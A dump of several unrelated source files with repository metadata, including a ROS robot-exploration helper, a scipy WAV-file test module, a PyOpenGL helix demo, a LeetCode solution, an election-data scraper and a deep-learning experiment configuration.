self.global_frame=rospy.get_param('~global_frame','/map') #by ding
self.listener=tf.TransformListener()
        self.listener.waitForTransform(self.global_frame, '/base_footprint', rospy.Time(0), rospy.Duration(10.0))  # by ding: not sure whether the self.name prefix should be dropped here
        cond = 0
        while cond == 0:
            try:
                (trans, rot) = self.listener.lookupTransform(self.global_frame, '/base_footprint', rospy.Time(0))  # by ding
                cond = 1
            except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
                cond = 0  # was `cond==0`, a no-op comparison; keep retrying
self.position=array([trans[0],trans[1]])
self.assigned_point=self.position
self.client=actionlib.SimpleActionClient('/move_base', MoveBaseAction) #by ding
self.client.wait_for_server()
robot.goal.target_pose.header.frame_id=self.global_frame
robot.goal.target_pose.header.stamp=rospy.Time.now()
        rospy.wait_for_service('/move_base_node/GlobalPlanner/make_plan')  # by ding: study move_base to understand /NavfnROS/make_plan
        self.make_plan = rospy.ServiceProxy('/move_base_node/GlobalPlanner/make_plan', GetPlan)  # by ding
robot.start.header.frame_id=self.global_frame
robot.end.header.frame_id=self.global_frame
    # get the robot's current position coordinates
def getPosition(self):
        cond = 0
        while cond == 0:
            try:
                (trans, rot) = self.listener.lookupTransform(self.global_frame, '/base_footprint', rospy.Time(0))  # by ding
                cond = 1
            except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
                cond = 0  # was `cond==0`, a no-op comparison; keep retrying
self.position=array([trans[0],trans[1]])
return self.position
    # send a goal point to move_base
def sendGoal(self,point):
robot.goal.target_pose.pose.position.x=point[0]
robot.goal.target_pose.pose.position.y=point[1]
robot.goal.target_pose.pose.orientation.w = 1.0
self.client.send_goal(robot.goal)
self.assigned_point=array(point)
rospy.loginfo("the functions.py send goal"+robot.goal) #by ding
    # cancel the current goal
def cancelGoal(self):
self.client.cancel_goal()
self.assigned_point=self.getPosition()
def getState(self):
return self.client.get_state()
def makePlan(self,start,end):
robot.start.pose.position.x=start[0]
robot.start.pose.position.y=start[1]
robot.end.pose.position.x=end[0]
robot.end.pose.position.y=end[1]
start=self.listener.transformPose('/map', robot.start) #by ding
end=self.listener.transformPose('/map', robot.end) #by ding
#plan=self.make_plan(start = start, goal = end, tolerance = 0.0)
        plan = self.make_plan(start=start, goal=end, tolerance=0.1)  # tolerance is in meters, by ding
rospy.loginfo("the functions.py makeplan") #by ding
return plan.plan.poses
#________________________________________________________________________________
def index_of_point(mapData, Xp):  # my own understanding, may be off: row-major grid index of a coordinate point
resolution=mapData.info.resolution
Xstartx=mapData.info.origin.position.x
Xstarty=mapData.info.origin.position.y
width=mapData.info.width
Data=mapData.data
index=int( ( floor((Xp[1]-Xstarty)/resolution)*width)+( floor((Xp[0]-Xstartx)/resolution) ))
return index
def point_of_index(mapData, i):  # coordinates of the point at a given index
    y = mapData.info.origin.position.y + (i // mapData.info.width) * mapData.info.resolution
    x = mapData.info.origin.position.x + (i - (i // mapData.info.width) * mapData.info.width) * mapData.info.resolution
return array([x,y])
#________________________________________________________________________________
def informationGain(mapData, point, r):  # information gain around a point: count unknown cells within radius r
    infoGain = 0
index=index_of_point(mapData,point)
r_region=int(r/mapData.info.resolution)
init_index=index-r_region*(mapData.info.width+1)
for n in range(0,2*r_region+1):
start=n*mapData.info.width+init_index
end=start+2*r_region
limit=((start/mapData.info.width)+2)*mapData.info.width
for i in range(start,end+1):
if (i>=0 and i<limit and i<len(mapData.data)):
if(mapData.data[i]==-1 and norm(array(point)-point_of_index(mapData,i))<=r):
infoGain+=1
return infoGain*(mapData.info.resolution**2)
#________________________________________________________________________________
def discount(mapData,assigned_pt,centroids,infoGain,r):
index=index_of_point(mapData,assigned_pt)
r_region=int(r/mapData.info.resolution)
init_index=index-r_region*(mapData.info.width+1)
for n in range(0,2*r_region+1):
start=n*mapData.info.width+init_index
end=start+2*r_region
limit=((start/mapData.info.width)+2)*mapData.info.width
for i in range(start,end+1):
if (i>=0 and i<limit and i<len(mapData.data)):
for j in range(0,len(centroids)):
current_pt=centroids[j]
if(mapData.data[i]==-1 and norm(point_of_index(mapData,i)-current_pt)<=r and norm(point_of_index(mapData,i)-assigned_pt)<=r):
infoGain[j]-=1 #this should be modified, subtract the area of a cell, not 1
return infoGain
#________________________________________________________________________________
def pathCost(path):
    if (len(path) > 0):
        i = len(path) // 2  # integer midpoint (plain / would give a float index on Python 3)
        p1 = array([path[i - 1].pose.position.x, path[i - 1].pose.position.y])
        p2 = array([path[i].pose.position.x, path[i].pose.position.y])
        return norm(p1 - p2) * (len(path) - 1)
else:
return inf
#________________________________________________________________________________
def unvalid(mapData,pt):
index=index_of_point(mapData,pt)
r_region=5
init_index=index-r_region*(mapData.info.width+1)
for n in range(0,2*r_region+1):
start=n*mapData.info.width+init_index
end=start+2*r_region
limit=((start/mapData.info.width)+2)*mapData.info.width
for i in range(start,end+1):
if (i>=0 and i<limit and i<len(mapData.data)):
if(mapData.data[i]==1):
return True
return False
#________________________________________________________________________________
def Nearest(V,x):
n=inf
i=0
for i in range(0,V.shape[0]):
n1=norm(V[i,:]-x)
if (n1<n):
n=n1
result=i
return result
#________________________________________________________________________________
def Nearest2(V, x):
    n = inf
    result = 0
    for i in range(0, len(V)):
        n1 = norm(V[i] - x)
        if (n1 < n):
            n = n1
            result = i  # the original never updated result and returned the loop variable instead
    return result
#________________________________________________________________________________
def gridValue(mapData,Xp):
resolution=mapData.info.resolution
Xstartx=mapData.info.origin.position.x
Xstarty=mapData.info.origin.position.y
width=mapData.info.width
Data=mapData.data
# returns grid value at "Xp" location
#map data: 100 occupied -1 unknown 0 free
index=( floor((Xp[1]-Xstarty)/resolution)*width)+( floor((Xp[0]-Xstartx)/resolution) )
if int(index) < len(Data):
return Data[int(index)]
else:
return 100
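
# ---------------------------------------------------------------------------
# Hedged sketch (added for illustration; not part of the original node).
# index_of_point / point_of_index map between world coordinates and the
# row-major OccupancyGrid index. The mock map below only fakes the fields the
# two functions actually read; it is an assumption, not a real
# nav_msgs/OccupancyGrid message.
if __name__ == '__main__':
    class _Mock(object):
        pass
    m = _Mock(); m.info = _Mock(); m.info.origin = _Mock(); m.info.origin.position = _Mock()
    m.info.resolution = 0.5
    m.info.origin.position.x = -2.0
    m.info.origin.position.y = -2.0
    m.info.width = 8
    m.data = [0] * 64                       # an 8x8 all-free grid
    idx = index_of_point(m, [0.0, 0.0])     # world (0, 0) -> cell index 36
    print(idx, point_of_index(m, idx))      # -> 36 [0. 0.]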
|
[
"623395241@qq.com"
] |
623395241@qq.com
|
c4bbebeeaa1fede9542e856ca68e24409905d33f
|
c0f808504dd3d7fd27c39f1503fbc14c1d37bf9f
|
/sources/scipy-scipy-414c1ab/scipy/io/tests/test_wavfile.py
|
266775ecd99e28e8010c480d95ff5fce9e266339
|
[] |
no_license
|
georgiee/lip-sync-lpc
|
7662102d4715e4985c693b316a02d11026ffb117
|
e931cc14fe4e741edabd12471713bf84d53a4250
|
refs/heads/master
| 2018-09-16T08:47:26.368491
| 2018-06-05T17:01:08
| 2018-06-05T17:01:08
| 5,779,592
| 17
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,146
|
py
|
import os
import tempfile
import warnings
import numpy as np
from numpy.testing import assert_equal, assert_, assert_raises, assert_array_equal
from numpy.testing.utils import WarningManager
from scipy.io import wavfile
def datafile(fn):
return os.path.join(os.path.dirname(__file__), 'data', fn)
def test_read_1():
warn_ctx = WarningManager()
warn_ctx.__enter__()
try:
warnings.simplefilter('ignore', wavfile.WavFileWarning)
rate, data = wavfile.read(datafile('test-44100-le-1ch-4bytes.wav'))
finally:
warn_ctx.__exit__()
assert_equal(rate, 44100)
assert_(np.issubdtype(data.dtype, np.int32))
assert_equal(data.shape, (4410,))
def test_read_2():
rate, data = wavfile.read(datafile('test-8000-le-2ch-1byteu.wav'))
assert_equal(rate, 8000)
assert_(np.issubdtype(data.dtype, np.uint8))
assert_equal(data.shape, (800, 2))
def test_read_fail():
    fp = open(datafile('example_1.nc'), 'rb')  # binary mode, so the check also holds on Python 3
assert_raises(ValueError, wavfile.read, fp)
fp.close()
def _check_roundtrip(rate, dtype, channels):
fd, tmpfile = tempfile.mkstemp(suffix='.wav')
try:
os.close(fd)
data = np.random.rand(100, channels)
if channels == 1:
data = data[:,0]
data = (data*128).astype(dtype)
wavfile.write(tmpfile, rate, data)
rate2, data2 = wavfile.read(tmpfile)
assert_equal(rate, rate2)
assert_(data2.dtype.byteorder in ('<', '=', '|'), msg=data2.dtype)
assert_array_equal(data, data2)
finally:
os.unlink(tmpfile)
def test_write_roundtrip():
for signed in ('i', 'u'):
for size in (1, 2, 4, 8):
if size == 1 and signed == 'i':
# signed 8-bit integer PCM is not allowed
continue
for endianness in ('>', '<'):
if size == 1 and endianness == '<':
continue
for rate in (8000, 32000):
for channels in (1, 2, 5):
dt = np.dtype('%s%s%d' % (endianness, signed, size))
yield _check_roundtrip, rate, dt, channels
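
# ---------------------------------------------------------------------------
# Hedged sketch (added; not part of the original test module). The `yield` in
# test_write_roundtrip is nose-style test generation, so any single case can
# also be exercised directly:
if __name__ == '__main__':
    _check_roundtrip(8000, np.dtype('<i2'), 2)   # little-endian int16, stereo
    print('roundtrip ok')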
|
[
"georgios@kaleadis.de"
] |
georgios@kaleadis.de
|
179abd03f2ae118cfb2b85da6360707ead06748a
|
1b10b46afdf24b4ce4f2d57e315e09e17c0a9c2b
|
/winding_helix.py
|
51d16cff03b2651355fadbdb7bd2a560ed49af5b
|
[] |
no_license
|
tthtlc/sansagraphics
|
e6aad1541dabc85b3871e1890c9f79aa33055355
|
113e559fb128c93ed1f02155ec74e76878b86c37
|
refs/heads/master
| 2021-01-15T15:52:35.126301
| 2020-03-30T16:58:57
| 2020-03-30T16:58:57
| 15,507,431
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,415
|
py
|
# Pygame/PyopenGL example by Bastiaan Zapf, Apr 2009
### From http://python-opengl-examples.blogspot.sg/
#
# Draw an helix, wiggle it pleasantly
#
# Keywords: Alpha Blending, Textures, Animation, Double Buffer
from OpenGL.GL import *
from OpenGL.GLU import *
from math import * # trigonometry
import pygame # just to get a display
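
# ---------------------------------------------------------------------------
# Hedged sketch (added; not part of the original demo). The triangle strip in
# the main loop samples a small circle of radius r twisted around a big circle
# of radius R, with a per-vertex phase offset chosen by i % 3. The helper
# below reproduces the i % 3 == 0 branch of that parametrisation so the maths
# can be inspected without any OpenGL state; the name is an assumption.
def helix_point(i, r=5.0, R=10.0):
    """(x, y, z) of strip vertex i, matching the i % 3 == 0 branch below."""
    j = i
    s = -2.5 + i * 0.05                    # slow drift along the big circle
    x = cos(i / r) * cos(j / R) + s * sin(j / R)
    y = s * cos(j / R) - cos(i / r) * sin(j / R)
    z = sin(i / r)
    return (x, y, z)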
# get an OpenGL surface
pygame.init()
pygame.display.set_mode((800,600), pygame.OPENGL|pygame.DOUBLEBUF)
# How to catch errors here?
done = False
t=0
while not done:
    t = t + 1
    # poll window events so the demo can actually be closed; the original
    # loop never updated `done`
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            done = True
# for fun comment out these two lines
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
# Get a perspective at the helix
glMatrixMode(GL_PROJECTION);
glLoadIdentity()
gluPerspective(90,1,0.01,1000)
gluLookAt(sin(t/200.0)*3,sin(t/500.0)*3,cos(t/200.0)*3,0,0,0,0,1,0)
# Draw the helix (this ought to be a display list call)
glMatrixMode(GL_MODELVIEW)
# get a texture (this ought not to be inside the inner loop)
texture=glGenTextures( 1 )
glBindTexture( GL_TEXTURE_2D, texture );
glTexEnvf( GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_MODULATE );
# set sane defaults for a plethora of potentially uninitialized
# variables
glTexParameterf( GL_TEXTURE_2D, GL_TEXTURE_WRAP_S,
GL_REPEAT);
glTexParameterf( GL_TEXTURE_2D, GL_TEXTURE_WRAP_T,
GL_REPEAT );
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
# a texture
#pulse = sin(t/30)*0.5+0.5 # try this one
pulse = 0
texdata=[[[0.0,0,1,1],
[0.0,0,0,0],
[0.0,1,0,1],
[0.0,0,0,0]],
[[0.0,0,0,0],
[pulse,pulse,pulse,1],
[pulse,pulse,pulse,1],
[0.0,0,0,0]],
[[0.0,1,0,1],
[1,pulse,pulse,1],
[pulse,pulse,0,1],
[0.0,0,0,0]],
[[0.0,0,0,0],
[0.0,0,0,0],
[0.0,0,0,0],
[0.0,0,0,0]]];
glTexImage2Df(GL_TEXTURE_2D, 0,4,0,GL_RGBA,
texdata)
glEnable(GL_BLEND);
glBlendFunc (GL_SRC_ALPHA, GL_ONE); # XXX Why GL_ONE?
# alternatively:
# glEnable(GL_DEPTH_TEST);
glEnable( GL_TEXTURE_2D );
# use the texture
glBindTexture( GL_TEXTURE_2D, texture );
# vertices & texture data
glBegin(GL_TRIANGLE_STRIP);
#pulse2 = 0.5
for i in range(0,100):
r=5.0 # try other values - integers as well
R=10.0
d=1 # try other values
j=i
#pulse2 += 0.5
if (i%3==0):
glTexCoord2f(0,i);
glVertex3f( cos(i/r)*cos(j/R) + (-2.5+i*0.05)*sin(j/R), (-2.5+i*0.05)*cos(j/R) - cos(i/r)*sin(j/R), sin(i/r));
elif (i%3==1):
glTexCoord2f(1,i);
glVertex3f( cos(i/r + 3.14/2)*cos(j/R) + (-2.5+i*0.05)*sin(j/R), (-2.5+i*0.05)*cos(j/R) - cos(i/r)*sin(j/R), sin(i/r + 3.14/1));
else:
glTexCoord2f(2,i);
glVertex3f( cos(i/r + 3.14/1)*cos(j/R) + (-2.5+i*0.05)*sin(j/R), (-2.5+i*0.05)*cos(j/R) - cos(i/r)*sin(j/R), sin(i/r+3.14/1));
# glVertex3f( cos(i/r+3.14)*pulse2, -2.5+i*0.05+d+pulse2*1, sin(i/r+3.14)*pulse2);
glEnd();
glFlush()
glDeleteTextures(texture)
pygame.display.flip()
|
[
"htmldeveloper@gmail.com"
] |
htmldeveloper@gmail.com
|
affeefebfe3fea12f782e19ec9b4436fcfec1e64
|
8489a961a13492fea2ef76f18b86fa2ecaec93c2
|
/web_app_interface/marfSite/manage.py
|
67388189c584ba2d010e526d7c135676b6f18c5e
|
[] |
no_license
|
kavanomo/teamMarf
|
84ff8496488cc8f27a997fddbd550798ee6218d4
|
461d23144d26e8836e04e6c930a961fccef28465
|
refs/heads/master
| 2020-03-30T05:14:15.681749
| 2019-03-15T03:33:35
| 2019-03-15T03:33:35
| 150,788,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 540
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'marfSite.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"robbie.windsor+git@gmail.com"
] |
robbie.windsor+git@gmail.com
|
84eeb4e216661d1b5592535c6727d2131a0709a8
|
5c84c379978ac4c663d6193ea2e4e156f1fc0922
|
/hard/149_maxpoints_on_a_line.py
|
ed5bf69070d34a3ddba151cc7ec4590f1eb836f8
|
[] |
no_license
|
nraghuveer/leetcode
|
a46483a9fd7f990410d6b9132c618e5d54baf9a7
|
ca045ce2c6d23fb8f92ea9871565b21cbdbeef19
|
refs/heads/master
| 2021-07-01T15:43:43.249587
| 2020-10-15T17:47:38
| 2020-10-15T17:47:38
| 180,434,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,806
|
py
|
# https://leetcode.com/problems/max-points-on-a-line/
# using slope ?
# if two points have same slope => colinear
# calculate slope for n points with n - 1 points => O(pow(n,2)) => not good
from collections import defaultdict
from typing import List
def gcd(x,y):
while y:
x, y = y, x % y
return x
class Solution:
def maxPoints(self, points: List[List[int]]) -> int:
"""Get max points from given points that are on given lines"""
if not points:
return 0
slope_map = defaultdict(int)
l = len(points)
max_count = 0
for i in range(l):
curmax = overlap = vertical = 0
for j in range(i+1, l):
# if same point, track this to update count
if points[i] == points[j]:
overlap += 1
# to avoid ZeroDivisionError
elif points[i][0] == points[j][0]:
vertical += 1
else:
x = (points[j][1] - points[i][1])
y = (points[j][0] - points[i][0])
g = gcd(x,y)
                    x = x // g          # integer division keeps the dict key exact
                    y = y // g          # (gcd's sign also normalises opposite directions)
slope_map[(x,y)] += 1
curmax = max(curmax, slope_map[(x,y)])
            # vertical lines were tallied separately (to avoid ZeroDivisionError), so fold them in
            curmax = max(curmax, vertical)
            # clearing the dict matters: the stored slopes are relative to points[i]
            slope_map.clear()
# update the global count.
max_count = max(max_count, curmax + overlap + 1)
return max_count
if __name__ == "__main__":
solution = Solution()
assert solution.maxPoints([[1,1],[2,2],[3,3]]) == 3
print('done')
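    # ----------------------------------------------------------------------
    # Hedged demo (added; not part of the original solution): reducing the
    # slope vector by this gcd is what makes (dy, dx) pairs from collinear
    # points hash to the same dict key, and Euclid's algorithm with Python's
    # modulo keeps the reduced signs consistent:
    assert gcd(2, 4) == 2 and gcd(-2, -4) == -2    # both reduce (2, 4)-type pairs to (1, 2)
    assert solution.maxPoints([[0, 0], [1, 1], [-1, -1], [2, 3]]) == 3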
|
[
"raghuveernaraharisetti@gmail.com"
] |
raghuveernaraharisetti@gmail.com
|
b9bb003ddc62e1d45453d22efe039b1eb758af9c
|
20ae4d697181fb9810e13213313f97071e28e8ef
|
/parse/__main__.py
|
5fa9d49de4d1330cc22a9f8513310b2c9a4cc402
|
[] |
no_license
|
software-opal/nz-local-election
|
79afb0ad34a81f5be5018abe0062f0c159c4156a
|
904cd985ef9b225bf3c92c82fcbd66c68b1aa43d
|
refs/heads/master
| 2020-08-03T02:16:59.057271
| 2019-09-28T06:19:21
| 2019-09-28T06:19:21
| 211,593,768
| 0
| 0
| null | 2020-06-07T08:06:50
| 2019-09-29T02:57:20
|
Python
|
UTF-8
|
Python
| false
| false
| 2,985
|
py
|
import itertools
import json
import pathlib
from . import (
COUNCILLORS_URL_FORMATS,
DHB_URLS,
MAYOR_URLS,
REGIONAL_COUNCILLORS_URL_FORMATS,
)
from .load import InvalidPage, parse
from .visit import Requester
ROOT = pathlib.Path(__file__).parent.parent
DATA = ROOT / "public/data"
LOOKUP = ROOT / "src/assets/data_lookup.json"
COMBINED = DATA / "combined.json"
def candidates_json_safe(candidates):
return [c.as_dict() for c in candidates]
class Data:
def __init__(self):
self.r = Requester()
self.data = {}
self.grouped = {}
self.named = {}
def write(self):
LOOKUP.write_text(
json.dumps(
{"grouped": self.grouped, "named": self.named}, sort_keys=True, indent=2
)
)
COMBINED.write_text(json.dumps(self.data, sort_keys=True, indent=2))
def persist(self, url):
print(f"Requesting {url}")
base_url, response = self.r.request(url)
print(f" Parsing {len(response)} bytes of response")
election = parse(base_url, response)
fname = f"{election.id}.json"
self.data[election.id] = election.as_dict()
self.grouped.setdefault(election.type, {}).setdefault(election.region, {})[
election.electorate
] = election.id
self.named[election.id] = fname
(DATA / fname).write_text(
json.dumps(election.as_dict(), sort_keys=True, indent=2)
)
print(f" Written data to {fname}\n")
return election, fname
def main():
DATA.mkdir(parents=True, exist_ok=True)
d = Data()
for url_group in [DHB_URLS, MAYOR_URLS]:
for url in url_group:
try:
d.persist(url)
except InvalidPage:
print("Page didn't represent an election")
pass
d.write()
for url_format_group in [
COUNCILLORS_URL_FORMATS,
REGIONAL_COUNCILLORS_URL_FORMATS,
]:
for format in url_format_group:
old_election_region = None
for i in itertools.count(1):
url = format.format(i)
try:
election, _ = d.persist(url)
except InvalidPage:
print("Page didn't represent an election")
break
if old_election_region is not None:
assert (
old_election_region == election.region
), f"{old_election_region} != {election.region}"
old_election_region = election.region
d.write()
akl_local_board_format = "https://www.policylocal.nz/candidates/CB_076{:02}"
for i in itertools.count(3):
url = akl_local_board_format.format(i)
try:
d.persist(url)
except InvalidPage:
print("Page didn't represent an election")
break
d.write()
if __name__ == "__main__":
main()
|
[
"leesdolphin@gmail.com"
] |
leesdolphin@gmail.com
|
34659a2890a4b19d6a7a1abb7a98dd6fbe5adce9
|
0e1e643e864bcb96cf06f14f4cb559b034e114d0
|
/Exps_7_v3/doc3d/Ablation4_ch016_ep003_7_10/Gather2_W_fixGood_C_change/train/pyr_4s/L6/step10_a.py
|
2202753791e6d77741009c3408d45023e128a019
|
[] |
no_license
|
KongBOy/kong_model2
|
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
|
1af20b168ffccf0d5293a393a40a9fa9519410b2
|
refs/heads/master
| 2022-10-14T03:09:22.543998
| 2022-10-06T11:33:42
| 2022-10-06T11:33:42
| 242,080,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 140,332
|
py
|
#############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### add kong_model2 to sys.path
import os
code_exe_path = os.path.realpath(__file__)                              ### path of the currently running step10_b.py
code_exe_path_element = code_exe_path.split("\\")                       ### split the path so we can find which level kong_model2 sits at
code_dir = "\\".join(code_exe_path_element[:-1])
kong_layer = code_exe_path_element.index("kong_model2")                 ### find which level kong_model2 is at
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1])     ### locate the kong_model2 dir
import sys                                                              ### add kong_model2 to sys.path
sys.path.append(kong_model2_dir)
sys.path.append(code_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" code_dir:", code_dir)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
kong_to_py_layer = len(code_exe_path_element) - 1 - kong_layer    ### the -1 in the middle converts a length into an index
# print(" kong_to_py_layer:", kong_to_py_layer)
if (kong_to_py_layer == 0): template_dir = ""
elif(kong_to_py_layer == 2): template_dir = code_exe_path_element[kong_layer + 1][0:]  ### [7:] was meant to strip the step1x_ prefix; later decided a meaningful name can stay, so changed to 0
elif(kong_to_py_layer == 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:]  ### [5:] was meant to strip the mask_ prefix (added because a python module name cannot start with a digit); later the automatic ordering was acceptable, so changed to 0
elif(kong_to_py_layer > 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] + "/" + "/".join(code_exe_path_element[kong_layer + 3: -1])
# print("    template_dir:", template_dir)  ### e.g. template_dir: 7_mask_unet/5_os_book_and_paper_have_dtd_hdr_mix_bg_tv_s04_mae
#############################################################################################################################################################################################################
exp_dir = template_dir
#############################################################################################################################################################################################################
from step06_a_datas_obj import *
from step09_4side_L6 import *
from step10_a2_loss_info_obj import *
from step10_b2_exp_builder import Exp_builder
rm_paths = [path for path in sys.path if code_dir in path]
for rm_path in rm_paths: sys.path.remove(rm_path)
rm_moduless = [module for module in sys.modules if "step09" in module]
for rm_module in rm_moduless: del sys.modules[rm_module]
import Exps_7_v3.doc3d.Ablation4_ch016_ep003_7_10.W_w_M_to_C_pyr.pyr_4s.L6.step10_a as W_w_M_to_C_p20_pyr
from Exps_7_v3.doc3d.Ablation4_ch016_ep003_7_10.I_w_M_to_W_pyr.pyr_3s.L5.step10_a import ch032_1side_6__2side_5__3side_2__ep010 as I_w_M_to_W_p20_3s_L5_Good
#############################################################################################################################################################################################################
'''
exp_dir is the name of the folder "one level above" result_dir! A nested exp_dir is fine too~
e.g. with exp_dir = "6_mask_unet/a_name_you_pick", every result_dir lives under:
6_mask_unet/a_name_you_pick/result_a
6_mask_unet/a_name_you_pick/result_b
6_mask_unet/a_name_you_pick/...
'''
use_db_obj = type8_blender_kong_doc3d_v2
use_loss_obj = [mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wz").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wy").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wx").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Cx").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Cy").copy()] ### the z, y, x order follows step07_b_0b_Multi_UNet
#############################################################
### build an empty Exp_builder so result_analyze can draw blank figures
empty = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_1__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="為了resul_analyze畫空白的圖,建一個empty的 Exp_builder")
#############################################################
# "1" 3 6 10 15 21 28 36 45 55
# side1 OK 1
ch032_1side_1__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s1__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_1__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 "3" 6 10 15 21 28 36 45 55
# side2 OK 4
ch032_1side_2__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 "6" 10 15 21 28 36 45 55
# side3 OK 10
